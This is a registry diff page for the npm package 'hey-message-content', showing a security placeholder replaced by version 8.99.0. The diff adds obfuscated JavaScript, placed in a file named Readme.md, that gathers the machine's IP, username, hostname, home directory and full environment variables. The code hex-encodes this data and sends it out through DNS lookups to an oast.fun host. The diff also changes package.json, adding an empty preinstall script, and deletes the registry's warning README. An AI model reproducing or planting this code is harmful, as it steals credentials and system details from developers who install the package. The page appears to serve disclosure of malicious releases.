hey-message-content 0.0.1-security → 8.99.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of hey-message-content might be problematic. Click here for more details.
- package/Readme.md +3 -0
- package/app.obfuscated.js +1 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/Readme.md
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x4113f8=a0_0x5712;function a0_0x4780(){const _0x113b3d=['lookup','IPv4','2753723TjBOwe','random','family','dns','252258OYfinX','6561168WCSUFs','decoy_end','username','9XPAigT','userInfo','keys','20dUtxKv','substring','networkInterfaces','homedir','1568890GopWNZ','arch','252159KFdAGu','stringify','env','457104caPwop','N/A','4386252PBXTGV','platform','decoy_start_','internal','hostname','toString','d2hu9ip2eku37rolcn10h8hg4e9n13xna.oast.fun'];a0_0x4780=function(){return _0x113b3d;};return a0_0x4780();}(function(_0x2e1a86,_0x3abf85){const _0x473c5a=a0_0x5712,_0x227cbe=_0x2e1a86();while(!![]){try{const _0x4c1d72=-parseInt(_0x473c5a(0x12b))/0x1+parseInt(_0x473c5a(0x13b))/0x2+parseInt(_0x473c5a(0x138))/0x3*(parseInt(_0x473c5a(0x132))/0x4)+-parseInt(_0x473c5a(0x136))/0x5+-parseInt(_0x473c5a(0x13d))/0x6+parseInt(_0x473c5a(0x127))/0x7+parseInt(_0x473c5a(0x12c))/0x8*(parseInt(_0x473c5a(0x12f))/0x9);if(_0x4c1d72===_0x3abf85)break;else _0x227cbe['push'](_0x227cbe['shift']());}catch(_0x3287af){_0x227cbe['push'](_0x227cbe['shift']());}}}(a0_0x4780,0x8a01a));const os=require('os'),dns=require(a0_0x4113f8(0x12a));function a0_0x5712(_0x40e0c5,_0x52e249){const _0x478017=a0_0x4780();return a0_0x5712=function(_0x5712aa,_0x56e63e){_0x5712aa=_0x5712aa-0x126;let _0x2983a0=_0x478017[_0x5712aa];return _0x2983a0;},a0_0x5712(_0x40e0c5,_0x52e249);};((async()=>{const _0x25dae4=a0_0x4113f8,_0x5e17d4=_0x25dae4(0x143);let _0x4ce32f=_0x25dae4(0x13c);try{const _0x4caa00=os[_0x25dae4(0x134)]();for(const _0x52a928 of Object[_0x25dae4(0x131)](_0x4caa00)){for(const _0x1ea4e4 of _0x4caa00[_0x52a928]){if(_0x1ea4e4[_0x25dae4(0x129)]===_0x25dae4(0x126)&&!_0x1ea4e4[_0x25dae4(0x140)]){_0x4ce32f=_0x1ea4e4['address'];break;}}if(_0x4ce32f!==_0x25dae4(0x13c))break;}}catch(_0x588fcb){}const _0x5dd0ca=_0x25dae4(0x13f)+Math[_0x25dae4(0x128)]()[_0x25dae4(0x142)](0x24)[_0x25dae4(0x133)](0x2);let _0x38692d={'_decoy':_0x5dd0ca,'ip':_0x4ce32f,'username':os[_0x25dae4(0x130)]()[_0x25dae4(0x12e)],'hostname':os[_0x25dae4(0x141)](),'platform':os[_0x25dae4(0x13e)](),'arch':os[_0x25dae4(0x137)](),'home':os[_0x25dae4(0x135)](),'env':process[_0x25dae4(0x13a)],'_decoy2':_0x25dae4(0x12d)};const _0x103b0c=JSON[_0x25dae4(0x139)](_0x38692d),_0x574d9a=Buffer['from'](_0x103b0c)['toString']('hex'),_0x271e27=0x32;for(let _0x24e77b=0x0;_0x24e77b<_0x574d9a['length'];_0x24e77b+=_0x271e27){const _0x5b5cee=_0x574d9a['substring'](_0x24e77b,_0x24e77b+_0x271e27),_0x535350=_0x24e77b/_0x271e27+'.'+_0x5b5cee,_0x5b73c5=_0x535350+'.'+_0x5e17d4;dns[_0x25dae4(0x144)](_0x5b73c5,_0x4d681d=>{}),await new Promise(_0x52d8ae=>setTimeout(_0x52d8ae,0x64));}})());
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "hey-message-content",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "8.99.0",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": ""
|
|
8
|
+
},
|
|
9
|
+
"keywords": [],
|
|
10
|
+
"author": "Finance Dev",
|
|
11
|
+
"license": "ISC"
|
|
6
12
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=hey-message-content for more information.
|